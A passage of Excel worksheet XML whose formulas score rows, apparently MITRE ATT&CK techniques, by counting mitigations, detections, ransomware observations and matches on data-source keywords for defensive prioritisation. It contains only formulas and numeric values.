        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z369">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA369">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB369">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC369" s="29" t="s">
        <v>1463</v>
      </c>
      <c r="AD369" s="25" t="str" cm="1">
        <f t="array" ref="AD369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC369)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE369" s="25">
        <f>IF(AD369="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF369" s="25" t="str" cm="1">
        <f t="array" ref="AF369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG369" s="25">
        <f>IF(AF369="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH369" s="25" t="str" cm="1">
        <f t="array" ref="AH369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI369" s="25">
        <f>IF(AH369="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ369" s="25" t="str" cm="1">
        <f t="array" ref="AJ369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK369" s="25">
        <f>IF(AJ369="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL369" s="25" t="str" cm="1">
        <f t="array" ref="AL369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM369" s="25">
        <f>IF(AL369="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN369" s="52">
        <v>1</v>
      </c>
      <c r="AO369" s="51">
        <v>1</v>
      </c>
      <c r="AP369" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6152380952380954E-2</v>
      </c>
      <c r="AQ369" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AR369" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AS369" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT369" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU36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70" spans="1:47" ht="48">
      <c r="A370" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5333333333333333E-2</v>
      </c>
      <c r="B370" s="25">
        <f>SUM(H370,M370,V370)*(1+SUM(AE370,AG370,AI370,AK370,AM370))</f>
        <v>0.25333333333333335</v>
      </c>
      <c r="C370" s="25" t="s">
        <v>1464</v>
      </c>
      <c r="D370" s="25" t="s">
        <v>309</v>
      </c>
      <c r="E370" s="25" t="s">
        <v>1465</v>
      </c>
      <c r="F370" s="51">
        <v>1</v>
      </c>
      <c r="G370" s="51">
        <v>1</v>
      </c>
      <c r="H370" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I370">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J370">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K370">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L370">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M370" s="25">
        <v>0</v>
      </c>
      <c r="N370" s="51">
        <v>3</v>
      </c>
      <c r="O370" s="51">
        <v>5</v>
      </c>
      <c r="P370" s="51">
        <v>0</v>
      </c>
      <c r="Q370" s="51">
        <v>11</v>
      </c>
      <c r="R370" s="51"/>
      <c r="S370" s="51">
        <v>0</v>
      </c>
      <c r="T370" s="51"/>
      <c r="U370" s="51">
        <v>0</v>
      </c>
      <c r="V370" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W370">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X370">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y370">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z370">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>19</v>
      </c>
      <c r="AA370">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.19</v>
      </c>
      <c r="AB370">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.19</v>
      </c>
      <c r="AC370" s="29" t="s">
        <v>1466</v>
      </c>
      <c r="AD370" s="25" t="str" cm="1">
        <f t="array" ref="AD370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC370)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE370" s="25">
        <f>IF(AD370="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF370" s="25" t="str" cm="1">
        <f t="array" ref="AF370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC370)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG370" s="25">
        <f>IF(AF370="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH370" s="25" t="str" cm="1">
        <f t="array" ref="AH370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC370)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI370" s="25">
        <f>IF(AH370="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ370" s="25" t="str" cm="1">
        <f t="array" ref="AJ370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC370)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK370" s="25">
        <f>IF(AJ370="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL370" s="25" t="str" cm="1">
        <f t="array" ref="AL370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC370)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM370" s="25">
        <f>IF(AL370="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN370" s="60">
        <v>0</v>
      </c>
      <c r="AO370" s="51">
        <v>0</v>
      </c>
      <c r="AP370" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5333333333333333E-2</v>
      </c>
      <c r="AQ370" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.4444444444444447E-2</v>
      </c>
      <c r="AR370" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.4444444444444447E-2</v>
      </c>
      <c r="AS370" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT370" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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71" spans="1:47">
      <c r="A371" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1561904761904765E-2</v>
      </c>
      <c r="B371" s="25">
        <f>SUM(H371,M371,V371)*(1+SUM(AE371,AG371,AI371,AK371,AM371))</f>
        <v>0.21561904761904763</v>
      </c>
      <c r="C371" s="25" t="s">
        <v>1467</v>
      </c>
      <c r="D371" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E371" s="25" t="s">
        <v>1468</v>
      </c>
      <c r="F371" s="51">
        <v>1</v>
      </c>
      <c r="G371" s="51">
        <v>1</v>
      </c>
      <c r="H371" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I371">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J371">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K371">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L371">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M371" s="25">
        <v>0</v>
      </c>
      <c r="N371" s="51">
        <v>0</v>
      </c>
      <c r="O371" s="51">
        <v>1</v>
      </c>
      <c r="P371" s="51">
        <v>0</v>
      </c>
      <c r="Q371" s="51">
        <v>0</v>
      </c>
      <c r="R371" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S371" s="51">
        <v>3</v>
      </c>
      <c r="T371" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U371" s="51">
        <v>6</v>
      </c>
      <c r="V371" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W371">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X371">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y371">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z371">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA371">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB371">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC371" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD371" s="25" t="str" cm="1">
        <f t="array" ref="AD371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE371" s="25">
        <f>IF(AD371="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF371" s="25" t="str" cm="1">
        <f t="array" ref="AF371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG371" s="25">
        <f>IF(AF371="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH371" s="25" t="str" cm="1">
        <f t="array" ref="AH371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC371)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI371" s="25">
        <f>IF(AH371="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ371" s="25" t="str" cm="1">
        <f t="array" ref="AJ371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK371" s="25">
        <f>IF(AJ371="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL371" s="25" t="str" cm="1">
        <f t="array" ref="AL371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM371" s="25">
        <f>IF(AL371="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN371" s="59">
        <v>0</v>
      </c>
      <c r="AO371" s="51">
        <v>0</v>
      </c>
      <c r="AP371" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1561904761904765E-2</v>
      </c>
      <c r="AQ371" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.187301587301588E-2</v>
      </c>
      <c r="AR371" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.187301587301588E-2</v>
      </c>
      <c r="AS371" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT371" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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72" spans="1:47" ht="32.1">
      <c r="A372" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="B372" s="25">
        <f>SUM(H372,M372,V372)*(1+SUM(AE372,AG372,AI372,AK372,AM372))</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="C372" s="25" t="s">
        <v>1470</v>
      </c>
      <c r="D372" s="25" t="s">
        <v>1471</v>
      </c>
      <c r="E372" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F372" s="51">
        <v>1</v>
      </c>
      <c r="G372" s="51">
        <v>1</v>
      </c>
      <c r="H372" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I372">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J372">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K372">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L372">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M372" s="25">
        <v>0</v>
      </c>
      <c r="N372" s="51">
        <v>1</v>
      </c>
      <c r="O372" s="51">
        <v>0</v>
      </c>
      <c r="P372" s="51">
        <v>0</v>
      </c>
      <c r="Q372" s="51">
        <v>0</v>
      </c>
      <c r="R372" s="53" t="s">
        <v>156</v>
      </c>
      <c r="S372" s="51">
        <v>2</v>
      </c>
      <c r="T372" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U372" s="51">
        <v>7</v>
      </c>
      <c r="V372" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W372">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X372">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y372">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z372">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA372">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB372">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC372" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD372" s="25" t="str" cm="1">
        <f t="array" ref="AD372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE372" s="25">
        <f>IF(AD372="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF372" s="25" t="str" cm="1">
        <f t="array" ref="AF372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC372)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG372" s="25">
        <f>IF(AF372="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH372" s="25" t="str" cm="1">
        <f t="array" ref="AH372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI372" s="25">
        <f>IF(AH372="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ372" s="25" t="str" cm="1">
        <f t="array" ref="AJ372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK372" s="25">
        <f>IF(AJ372="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL372" s="25" t="str" cm="1">
        <f t="array" ref="AL372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM372" s="25">
        <f>IF(AL372="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN372" s="58">
        <v>0</v>
      </c>
      <c r="AO372" s="51">
        <v>0</v>
      </c>
      <c r="AP372" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="AQ372" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.3492063492063489E-2</v>
      </c>
      <c r="AR372" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.3492063492063489E-2</v>
      </c>
      <c r="AS372" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT372" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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73" spans="1:47">
      <c r="A373" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2819047619047617E-2</v>
      </c>
      <c r="B373" s="25">
        <f>SUM(H373,M373,V373)*(1+SUM(AE373,AG373,AI373,AK373,AM373))</f>
        <v>0.22819047619047617</v>
      </c>
      <c r="C373" s="25" t="s">
        <v>1472</v>
      </c>
      <c r="D373" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E373" s="25" t="s">
        <v>1473</v>
      </c>
      <c r="F373" s="51">
        <v>1</v>
      </c>
      <c r="G373" s="51">
        <v>1</v>
      </c>
      <c r="H373" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I373">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J373">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K373">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L373">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M373" s="25">
        <v>0</v>
      </c>
      <c r="N373" s="51">
        <v>0</v>
      </c>
      <c r="O373" s="51">
        <v>1</v>
      </c>
      <c r="P373" s="51">
        <v>0</v>
      </c>
      <c r="Q373" s="51">
        <v>0</v>
      </c>
      <c r="R373" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S373" s="51">
        <v>3</v>
      </c>
      <c r="T373" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U373" s="51">
        <v>6</v>
      </c>
      <c r="V373" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W373">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X373">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y373">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z373">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA373">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB373">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC373" s="29" t="s">
        <v>1474</v>
      </c>
      <c r="AD373" s="25" t="str" cm="1">
        <f t="array" ref="AD373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC373)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE373" s="25">
        <f>IF(AD373="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF373" s="25" t="str" cm="1">
        <f t="array" ref="AF373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG373" s="25">
        <f>IF(AF373="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH373" s="25" t="str" cm="1">
        <f t="array" ref="AH373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI373" s="25">
        <f>IF(AH373="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ373" s="25" t="str" cm="1">
